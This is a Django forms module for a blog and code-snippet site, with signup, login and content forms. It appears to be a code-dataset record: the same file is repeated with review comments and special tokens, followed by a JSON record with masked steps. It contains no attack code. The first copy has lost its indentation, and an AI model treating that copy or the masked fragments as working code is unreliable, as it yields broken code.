super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SignupForm(UserCreationForm):
<|reserved_special_token_0|>
class Meta:
model = User
fields = 'username', 'email', 'password1', 'password2'
<|reserved_special_token_0|>
class UserRegistrationForm(forms.Form):
    """Registration form: username (min 6 chars), email, names, password pair."""
    username = forms.CharField(required=True, min_length=6, label=
        'Username', max_length=100, widget=forms.TextInput(attrs={
        'placeholder': 'Username'}))
    email = forms.EmailField(required=True, label='Email', max_length=100,
        widget=forms.EmailInput(attrs={'placeholder':
        'e.g. : email@gmail.com'}))
    firstname = forms.CharField(required=True, label='First Name',
        max_length=100, widget=forms.TextInput(attrs={'placeholder':
        'First Name'}))
    lastname = forms.CharField(required=True, label='Last Name', max_length
        =100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))
    password = forms.CharField(required=True, label='Password', max_length=
        100, widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))
    passwordagain = forms.CharField(required=True, label='Password (Again)',
        max_length=100, widget=forms.PasswordInput(attrs={'placeholder':
        'Password (Again)'}))
class TblPublishForm(forms.ModelForm):
    """ModelForm exposing every field of TblPublish."""
    class Meta:
        model = TblPublish
        fields = '__all__'
class TblSnippetDataForm(forms.ModelForm):
    """Snippet-entry form (subject, description, keyword, code)."""
    class Meta:
        model = TblSnippetData
        # NOTE(review): 'snippet_topics' appears twice in this list —
        # presumably a copy-paste slip; harmless but worth deduplicating.
        fields = ['snippet_topics', 'snippet_data_subject',
            'snippet_data_description', 'snippet_data_keyword',
            'snippet_data_code', 'snippet_data_datetime',
            'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']
    def clean_snippet_topics_added_by(self):
        # NOTE(review): this form declares no 'snippet_topics_added_by' field,
        # so Django never invokes this hook — presumably it was meant to be
        # clean_snippet_data_added_by; confirm intent before renaming.
        if not self.cleaned_data['snippet_topics_added_by']:
            return User()
        return self.cleaned_data['snippet_topics_added_by']
    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblSnippetDataForm, self).__init__(*args, **kwargs)
        self.fields['snippet_data_datetime'].widget = forms.HiddenInput()
        self.fields['snippet_data_added_by'].widget = forms.HiddenInput()
        self.fields['snippet_topics'].widget = forms.HiddenInput()
        self.fields['snippet_data_subject'].widget.attrs['placeholder'
            ] = 'Title/Topics'
        self.fields['snippet_data_description'].widget.attrs['placeholder'
            ] = 'Brief Description'
        self.fields['snippet_data_keyword'].widget.attrs['placeholder'
            ] = 'Keyword For Search'
        self.fields['snippet_data_code'].widget.attrs['placeholder'
            ] = 'Snippet (Code)'
        self.fields['snippet_data_publish'].widget.attrs['placeholder'
            ] = 'Ready-To-Publish'
        self.fields['snippet_data_publish'].label = 'Publish'
class TblBlogForm(forms.ModelForm):
    """Blog-post form; timestamp/summary/like/author fields are hidden."""
    class Meta:
        model = TblBlog
        fields = ['blog_title', 'blog_description', 'blog_keyword',
            'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
            'blog_summary', 'blog_like', 'blog_added_by']
    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblBlogForm, self).__init__(*args, **kwargs)
        self.fields['blog_datetime'].widget = forms.HiddenInput()
        self.fields['blog_summary'].widget = forms.HiddenInput()
        self.fields['blog_like'].widget = forms.HiddenInput()
        self.fields['blog_added_by'].widget = forms.HiddenInput()
        self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
        self.fields['blog_description'].widget.attrs['placeholder'
            ] = 'Brief Description'
        self.fields['blog_content'].widget.attrs['placeholder'
            ] = 'Blog Content'
        self.fields['blog_keyword'].widget.attrs['placeholder'
            ] = 'Keyword For Search'
        self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
        self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
    """ModelForm exposing every field of TblBlogComments."""
    class Meta:
        model = TblBlogComments
        fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
    """Learning-entry form; bookkeeping fields are hidden from the user."""
    class Meta:
        model = TblLearnData
        fields = ['learn_data', 'learn_data_keyword',
            'learn_data_description', 'learn_data_publish',
            'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
            'learn_data_like', 'learn_data_icon']
    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblLearnDataForm, self).__init__(*args, **kwargs)
        self.fields['learn_data_datetime'].widget = forms.HiddenInput()
        self.fields['learn_data_added_by'].widget = forms.HiddenInput()
        self.fields['learn_topics'].widget = forms.HiddenInput()
        self.fields['learn_data_like'].widget = forms.HiddenInput()
        self.fields['learn_data_icon'].widget = forms.HiddenInput()
        self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
        self.fields['learn_data_description'].widget.attrs['placeholder'
            ] = 'Brief Description'
        self.fields['learn_data_keyword'].widget.attrs['placeholder'
            ] = 'Keyword For Search'
        self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
    """ModelForm exposing every field of TblLearnDataComments."""
    class Meta:
        model = TblLearnDataComments
        fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
    """ModelForm exposing every field of TblBlogGvp."""
    class Meta:
        model = TblBlogGvp
        fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
    """ModelForm exposing every field of TblLearnDataGvp."""
    class Meta:
        model = TblLearnDataGvp
        fields = '__all__'
class TblHomeForm(forms.ModelForm):
    """Home-page content form; datetime/author fields are hidden."""
    class Meta:
        model = TblHome
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblHomeForm, self).__init__(*args, **kwargs)
        self.fields['home_datetime'].widget = forms.HiddenInput()
        self.fields['home_added_by'].widget = forms.HiddenInput()
        self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
        self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
        self.fields['home_content_description'].widget.attrs['placeholder'
            ] = 'Description'
        self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
    """About-page content form; datetime/author fields are hidden."""
    class Meta:
        model = TblAbout
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblAboutForm, self).__init__(*args, **kwargs)
        self.fields['about_datetime'].widget = forms.HiddenInput()
        self.fields['about_added_by'].widget = forms.HiddenInput()
        self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
        self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
        self.fields['about_content_description'].widget.attrs['placeholder'
            ] = 'Description'
        self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
    """Learning-topic form; datetime and cover image are hidden."""
    class Meta:
        model = TblLearnTopics
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
        self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
        self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
        self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
        self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
        self.fields['learn_topics_description'].widget.attrs['placeholder'
            ] = 'Description'
        self.fields['learn_topics_publish'].label = 'Publish'
    def clean_learn_topics_added_by(self):
        """Substitute an unsaved User() when the added-by value is empty."""
        if not self.cleaned_data['learn_topics_added_by']:
            return User()
        return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
    """ModelForm for snippet topics; hides bookkeeping fields, sets UI text."""
    class Meta:
        model = TblSnippetTopics
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        """Hide auto-managed widgets and attach placeholder text / labels."""
        super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
        self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
        self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
        self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
        self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
            )
        self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
        self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
        self.fields['snippet_topics_description'].widget.attrs['placeholder'
            ] = 'Description'
        self.fields['snippet_topics_publish'].label = 'Publish'
    def clean_snippet_topics_added_by(self):
        """Substitute an unsaved User() when the hidden added-by value is empty."""
        if not self.cleaned_data['snippet_topics_added_by']:
            return User()
        return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
    """Contact/query form backed by TblQueries."""
    class Meta:
        model = TblQueries
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        """Hide the timestamp field and attach input placeholders."""
        super(TblQueriesForm, self).__init__(*args, **kwargs)
        self.fields['datetime'].widget = forms.HiddenInput()
        self.fields['name'].widget.attrs['placeholder'] = 'Name'
        self.fields['email'].widget.attrs['placeholder'] = 'Email'
        self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
        self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
from django import forms
from django.contrib.auth.models import User
from .models import TblPublish , TblSnippetTopics, TblSnippetData, TblLearnTopics, TblLearnData, TblBlog, TblBlogComments,TblLearnDataComments, TblBlogGvp, TblLearnDataGvp,TblSnippetDataGvp, TblHome, TblAbout, TblQueries
from django.contrib.auth.forms import UserCreationForm
class UsersigninForm(forms.Form):
    """Sign-in form: username and password (password capped at 32 chars)."""

    username = forms.CharField(
        required=True, label='Username', max_length=100,
        widget=forms.TextInput(attrs={'placeholder': 'Username'}))
    password = forms.CharField(
        required=True, label='Password', max_length=32,
        widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))
class SignupForm(UserCreationForm):
    """UserCreationForm extended with a required email field."""

    email = forms.EmailField(max_length=200, help_text='Required')

    class Meta:
        model = User
        fields = ('username', 'email', 'password1', 'password2')

    def __init__(self, *args, **kwargs):
        """Attach placeholder text to the rendered inputs."""
        super(SignupForm, self).__init__(*args, **kwargs)
        self.fields['username'].widget.attrs['placeholder'] = 'Username'
        self.fields['email'].widget.attrs['placeholder'] = 'email'
        self.fields['password1'].widget.attrs['placeholder'] = 'password'
        self.fields['password2'].widget.attrs['placeholder'] = 'password Again'
class UserRegistrationForm(forms.Form):
    """Registration form: username (min 6 chars), email, names, password pair."""

    username = forms.CharField(
        required=True, min_length=6, label='Username', max_length=100,
        widget=forms.TextInput(attrs={'placeholder': 'Username'}))
    email = forms.EmailField(
        required=True, label='Email', max_length=100,
        widget=forms.EmailInput(attrs={'placeholder': 'e.g. : email@gmail.com'}))
    firstname = forms.CharField(
        required=True, label='First Name', max_length=100,
        widget=forms.TextInput(attrs={'placeholder': 'First Name'}))
    lastname = forms.CharField(
        required=True, label='Last Name', max_length=100,
        widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))
    password = forms.CharField(
        required=True, label='Password', max_length=100,
        widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))
    passwordagain = forms.CharField(
        required=True, label='Password (Again)', max_length=100,
        widget=forms.PasswordInput(attrs={'placeholder': 'Password (Again)'}))
class TblPublishForm(forms.ModelForm):
    """ModelForm exposing every field of TblPublish."""

    class Meta:
        model = TblPublish
        fields = '__all__'
class TblSnippetDataForm(forms.ModelForm):
    """Snippet-entry form; bookkeeping fields are hidden from the user."""

    class Meta:
        model = TblSnippetData
        # Duplicate 'snippet_topics' entry removed from the original list.
        fields = ['snippet_topics', 'snippet_data_subject',
                  'snippet_data_description', 'snippet_data_keyword',
                  'snippet_data_code', 'snippet_data_datetime',
                  'snippet_data_added_by', 'snippet_data_publish']

    def clean_snippet_topics_added_by(self):
        """Substitute an unsaved User() when the added-by value is empty.

        NOTE(review): this form declares no 'snippet_topics_added_by' field,
        so Django never calls this hook — it was probably meant to be
        clean_snippet_data_added_by; confirm intent before renaming.
        """
        if not self.cleaned_data['snippet_topics_added_by']:
            return User()
        return self.cleaned_data['snippet_topics_added_by']

    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblSnippetDataForm, self).__init__(*args, **kwargs)
        self.fields['snippet_data_datetime'].widget = forms.HiddenInput()
        self.fields['snippet_data_added_by'].widget = forms.HiddenInput()
        self.fields['snippet_topics'].widget = forms.HiddenInput()
        self.fields['snippet_data_subject'].widget.attrs['placeholder'] = 'Title/Topics'
        self.fields['snippet_data_description'].widget.attrs['placeholder'] = 'Brief Description'
        self.fields['snippet_data_keyword'].widget.attrs['placeholder'] = 'Keyword For Search'
        self.fields['snippet_data_code'].widget.attrs['placeholder'] = 'Snippet (Code)'
        self.fields['snippet_data_publish'].widget.attrs['placeholder'] = 'Ready-To-Publish'
        self.fields['snippet_data_publish'].label = 'Publish'
class TblBlogForm(forms.ModelForm):
    """Blog-post form; timestamp/summary/like/author fields are hidden."""

    class Meta:
        model = TblBlog
        fields = ['blog_title', 'blog_description', 'blog_keyword',
                  'blog_content', 'blog_pics', 'blog_publish',
                  'blog_datetime', 'blog_summary', 'blog_like',
                  'blog_added_by']

    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblBlogForm, self).__init__(*args, **kwargs)
        self.fields['blog_datetime'].widget = forms.HiddenInput()
        self.fields['blog_summary'].widget = forms.HiddenInput()
        self.fields['blog_like'].widget = forms.HiddenInput()
        self.fields['blog_added_by'].widget = forms.HiddenInput()
        self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
        self.fields['blog_description'].widget.attrs['placeholder'] = 'Brief Description'
        self.fields['blog_content'].widget.attrs['placeholder'] = 'Blog Content'
        self.fields['blog_keyword'].widget.attrs['placeholder'] = 'Keyword For Search'
        self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
        self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
    """ModelForm exposing every field of TblBlogComments."""

    class Meta:
        model = TblBlogComments
        fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
    """Learning-entry form; bookkeeping fields are hidden from the user."""

    class Meta:
        model = TblLearnData
        fields = ['learn_data', 'learn_data_keyword',
                  'learn_data_description', 'learn_data_publish',
                  'learn_data_datetime', 'learn_data_added_by',
                  'learn_topics', 'learn_data_like', 'learn_data_icon']

    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblLearnDataForm, self).__init__(*args, **kwargs)
        self.fields['learn_data_datetime'].widget = forms.HiddenInput()
        self.fields['learn_data_added_by'].widget = forms.HiddenInput()
        self.fields['learn_topics'].widget = forms.HiddenInput()
        self.fields['learn_data_like'].widget = forms.HiddenInput()
        self.fields['learn_data_icon'].widget = forms.HiddenInput()
        self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
        self.fields['learn_data_description'].widget.attrs['placeholder'] = 'Brief Description'
        self.fields['learn_data_keyword'].widget.attrs['placeholder'] = 'Keyword For Search'
        self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
    """ModelForm exposing every field of TblLearnDataComments."""

    class Meta:
        model = TblLearnDataComments
        fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
    """ModelForm exposing every field of TblBlogGvp."""

    class Meta:
        model = TblBlogGvp
        fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
    """ModelForm exposing every field of TblLearnDataGvp."""

    class Meta:
        model = TblLearnDataGvp
        fields = '__all__'
class TblHomeForm(forms.ModelForm):
    """Home-page content form; datetime/author fields are hidden."""

    class Meta:
        model = TblHome
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblHomeForm, self).__init__(*args, **kwargs)
        self.fields['home_datetime'].widget = forms.HiddenInput()
        self.fields['home_added_by'].widget = forms.HiddenInput()
        self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
        self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
        self.fields['home_content_description'].widget.attrs['placeholder'] = 'Description'
        self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
    """About-page content form; datetime/author fields are hidden."""

    class Meta:
        model = TblAbout
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblAboutForm, self).__init__(*args, **kwargs)
        self.fields['about_datetime'].widget = forms.HiddenInput()
        self.fields['about_added_by'].widget = forms.HiddenInput()
        self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
        self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
        self.fields['about_content_description'].widget.attrs['placeholder'] = 'Description'
        self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
    """Learning-topic form; datetime and cover image are hidden."""

    class Meta:
        model = TblLearnTopics
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        """Hide auto-managed fields and attach placeholder text."""
        super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
        self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
        self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
        self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
        self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
        self.fields['learn_topics_description'].widget.attrs['placeholder'] = 'Description'
        self.fields['learn_topics_publish'].label = 'Publish'

    def clean_learn_topics_added_by(self):
        """Substitute an unsaved User() when the added-by value is empty."""
        if not self.cleaned_data['learn_topics_added_by']:
            return User()
        return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
    """ModelForm for snippet topics; hides bookkeeping fields, sets UI text."""

    class Meta:
        model = TblSnippetTopics
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        """Hide auto-managed widgets and attach placeholder text / labels."""
        super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
        self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
        self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
        self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
        self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput()
        self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
        self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
        self.fields['snippet_topics_description'].widget.attrs['placeholder'] = 'Description'
        self.fields['snippet_topics_publish'].label = 'Publish'

    def clean_snippet_topics_added_by(self):
        """Substitute an unsaved User() when the hidden added-by value is empty."""
        if not self.cleaned_data['snippet_topics_added_by']:
            return User()
        return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
    """Contact/query form backed by TblQueries."""

    class Meta:
        model = TblQueries
        fields = '__all__'

    def __init__(self, *args, **kwargs):
        """Hide the timestamp field and attach input placeholders."""
        super(TblQueriesForm, self).__init__(*args, **kwargs)
        self.fields['datetime'].widget = forms.HiddenInput()
        self.fields['name'].widget.attrs['placeholder'] = 'Name'
        self.fields['email'].widget.attrs['placeholder'] = 'Email'
        self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
        self.fields['message'].widget.attrs['placeholder'] = 'Message'
|
flexible
|
{
"blob_id": "9e02b1a90d61de6d794dd350b50417a2f7260df6",
"index": 5947,
"step-1": "<mask token>\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n <mask token>\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = 
forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n 
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-2": "<mask token>\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, 